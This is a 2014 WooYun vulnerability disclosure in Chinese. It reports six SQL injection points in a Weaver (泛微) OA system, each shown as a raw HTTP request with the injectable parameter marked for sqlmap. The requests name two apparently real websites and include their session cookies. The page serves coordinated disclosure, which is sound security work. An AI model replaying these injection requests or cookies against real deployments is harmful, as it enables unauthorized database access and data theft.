当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082627

漏洞标题:泛微某系统通用型SQL注入漏洞打包(全版本)

相关厂商:cncert国家互联网应急中心

漏洞作者: Coody

提交时间:2014-11-09 14:23

修复时间:2014-12-24 14:24

公开时间:2014-12-24 14:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-09: 细节已通知厂商并且等待厂商处理中
2014-11-13: 厂商已经确认,细节仅向厂商公开
2014-11-23: 细节向核心白帽子及相关领域专家公开
2014-12-03: 细节向普通白帽子公开
2014-12-13: 细节向实习白帽子公开
2014-12-24: 细节向公众公开

简要描述:

SQL注入打包

详细说明:

对于躺枪的网站深表歉意哈~
被测网站:http://gl.triolion.com/ && http://oaf.yitoa.com:6688/
版本信息分别如下:

QQ图片20141109112348.jpg


QQ图片20141109112405.jpg


说明:主要以前面的网站为例,与后者交叉的证明两个SQL注入为通用型即可。
SQL注入漏洞(共6处)
1# 注入点1

GET /homepage/Homepage.jsp?hpid=4*&subCompanyId=1&isfromportal=1&isfromhp=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/wui/main.jsp?templateId=1
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test


QQ图片20141109110351.jpg


另一站点同样存在

GET /homepage/Homepage.jsp?hpid=21&subCompanyId=21&isfromhp=1&isfromportal=0&hastemplate= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://oaf.yitoa.com:6688/leftFrame.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: oaf.yitoa.com:6688
Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4


QQ图片20141109111035.jpg


2# 注入点2

GET /page/element/7/News.jsp?ebaseid=7&eid=17*&styleid=1&hpid=4&subCompanyId=1&e71415018052369= HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Accept: text/html, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7


注入1.jpg


另一站点同样存在

GET //page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: oaf.yitoa.com:6688
DNT: 1
Proxy-Connection: Keep-Alive
Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4


QQ图片20141109111625.jpg


3# 注入点3

GET /CRM/data/ViewCustomerBase.jsp?requestid=-1*&isrequest=&CustomerID=11613 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/CRM/data/ViewCustomer.jsp?CustomerID=11613*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test


QQ图片20141109111845.jpg


4# 注入点4

POST /page/element/compatible/view.jsp?ebaseid=9&eid=23*&styleid=1&hpid=4&subCompanyId=1&e71415018052423= HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Content-Length: 0
Accept: */*
Origin: http://gl.triolion.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7


注入2.jpg


5# 注入点5

GET /page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415=' HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Accept: text/html, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7


注入3.jpg


6# 注入点6

GET /proj/data/ViewProject.jsp?ProjID=56* HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/proj/search/searchtask.jsp?e71415500119375=
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test


注入4.jpg

漏洞证明:

同上

修复方案:

版权声明:转载请注明来源 Coody@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-13 13:40

厂商回复:

最新状态:

暂无